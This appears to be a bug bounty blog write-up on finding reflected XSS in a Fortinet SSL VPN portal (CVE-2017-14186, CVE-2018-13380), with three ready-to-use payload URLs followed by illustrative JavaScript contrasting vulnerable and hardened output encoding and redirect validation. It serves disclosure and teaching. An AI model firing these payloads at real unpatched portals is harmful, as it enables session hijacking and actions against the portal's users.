Hello everyone…
In this article I am going to tell you how I found a Reflected XSS on a public Bug Bounty program.
CVSS Score: 5.4 — CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
Cross-Site Scripting (XSS) is a security vulnerability commonly found in web applications. It occurs when an attacker is able to inject malicious scripts, usually JavaScript, into web pages viewed by other users. The injected script runs in the victim's browser with the privileges of the vulnerable site's origin, allowing the attacker to steal information, hijack user sessions, or perform other actions as the victim. In a reflected XSS the payload travels in the request (here, in URL query parameters) and is echoed back in the immediate response, so the attacker has to get the victim to open a crafted link. The root cause is almost always inadequate input validation and, above all, missing context-aware output encoding in the application code.
During the Bug Bounty assessment of the <target.com> domain, I identified a reflected Cross-Site Scripting (XSS) vulnerability in one of its subdomains.
During enumeration I noticed that a Fortinet SSL VPN web portal was running on the affected URL.
Then I browsed the URL manually and, judging by the URL parameters, guessed that it was a Fortinet SSL VPN web portal from which most of the web content had been removed, making it harder to identify.
Looking further for known vulnerabilities that could be used to exploit this Fortinet SSL VPN web portal, I identified that it was vulnerable to CVE-2017-14186 and CVE-2018-13380 in multiple parameters.
Then I tried to trigger the XSS in the affected URL using the payloads for the above mentioned CVEs, and it was successful.
Endpoint 1: /remote/loginredir, redir parameter
https://<target.com>/remote/loginredir?redir=javascript:alert(document.domain)
Payload: javascript:alert(document.domain)

Endpoint 2: /message, msg parameter
https://<target.com>/message?title=x&msg=%26%23%3Csvg/onload=alert("XSS_Triggered")%3E%3B
Payload (URL-encoded): %26%23%3Csvg/onload=alert("XSS_Triggered")%3E%3B
Payload (decoded): &#<svg/onload=alert("XSS_Triggered")>;

Endpoint 3: /remote/error, errmsg parameter
https://<target.com>/remote/error?errmsg=ABABAB-%3E%3Cscript%3Ealert("XSS_Triggered")%3C/script%3E
Payload (URL-encoded): ABABAB-%3E%3Cscript%3Ealert("XSS_Triggered")%3C/script%3E
Payload (decoded): ABABAB-><script>alert("XSS_Triggered")</script>

In each case the parameter value is reflected into the response without HTML encoding, so the browser parses it as markup; for the redir parameter the portal navigates to the supplied value, so a javascript: URL executes instead of redirecting.
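To make the mechanism concrete, here is an added example (it is not the article's code and not FortiOS code): a minimal model of the three reflection points above, each in its vulnerable form and a hardened form, plus the check used when confirming a reflection in a raw response. The endpoint templates, the portal origin https://vpn.example.com and the function names are assumptions for illustration; the real portal's code is not on this page.

```javascript
// Added example, not FortiOS code: the endpoint templates below are an
// assumed, simplified model of how /message, /remote/error and
// /remote/loginredir reflect their parameters.

// --- HTML context (/message?msg=..., /remote/error?errmsg=...) ---

// Vulnerable: the parameter value is placed into the page verbatim.
function renderMessageVulnerable(title, msg) {
  return `<h1>${title}</h1><p>${msg}</p>`;
}

// Hardened: encode the HTML-significant characters before output.
// Correct for element content and double-quoted attribute values only.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[c]);
}

function renderMessageSafe(title, msg) {
  return `<h1>${escapeHtml(title)}</h1><p>${escapeHtml(msg)}</p>`;
}

// --- URL context (/remote/loginredir?redir=...) ---

// Vulnerable: the portal navigates to whatever the parameter holds
// (in a browser, `location.href = redir`), so javascript: URLs execute.
function redirectTargetVulnerable(redir) {
  return redir;
}

// Hardened: resolve the value against the portal origin and allow only
// same-origin http(s) targets. Returns null when the caller should fall
// back to a fixed landing page. This also closes the open-redirect case.
function redirectTargetSafe(redir, portalOrigin) {
  let target;
  try {
    target = new URL(redir, portalOrigin);
  } catch {
    return null;
  }
  if (target.protocol !== 'https:' && target.protocol !== 'http:') return null;
  if (target.origin !== new URL(portalOrigin).origin) return null;
  return target.href;
}

// --- Check used when confirming a candidate reflection ---

// True when the decoded payload appears in the response body byte-for-byte.
// An HTML-encoded echo (&lt;svg ...&gt;) is not a reflection the browser
// will execute, so it is reported as false.
function reflectsUnencoded(body, payload) {
  return body.includes(payload);
}

// Decoded forms of the three payloads, computed from their URL encoding
// (the errmsg value follows the decoded form shown on the page).
const PAYLOADS = {
  redir: 'javascript:alert(document.domain)',
  msg: decodeURIComponent('%26%23%3Csvg/onload=alert("XSS_Triggered")%3E%3B'),
  errmsg: decodeURIComponent('ABABAB-%3E%3Cscript%3Ealert("XSS_Triggered")%3C/script%3E'),
};

// Stand-alone demonstration: the same payload against both renderings.
function demo() {
  return {
    vulnerable: reflectsUnencoded(renderMessageVulnerable('x', PAYLOADS.msg), PAYLOADS.msg),
    hardened: reflectsUnencoded(renderMessageSafe('x', PAYLOADS.msg), PAYLOADS.msg),
    redirBlocked: redirectTargetSafe(PAYLOADS.redir, 'https://vpn.example.com') === null,
  };
}
```

When verifying a reflection during a test, run the check against the raw HTTP response rather than the rendered DOM: a value that appears only after the browser has decoded entities is not exploitable. Note that escapeHtml is the right fix only for the HTML body context modelled here; a value reflected inside a script block or a URL needs the encoding for that context, and the redirect parameter is fixed by validation (same-origin http/https only), not by encoding.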
So that's how I found the XSS and reported it to the team.
That’s it guys…!!!!!! Hope you enjoyed this….
Happy Hunting ~~ Keep Learning !!
Support & follow guys……..!!! Thank you all. 💻🔰💱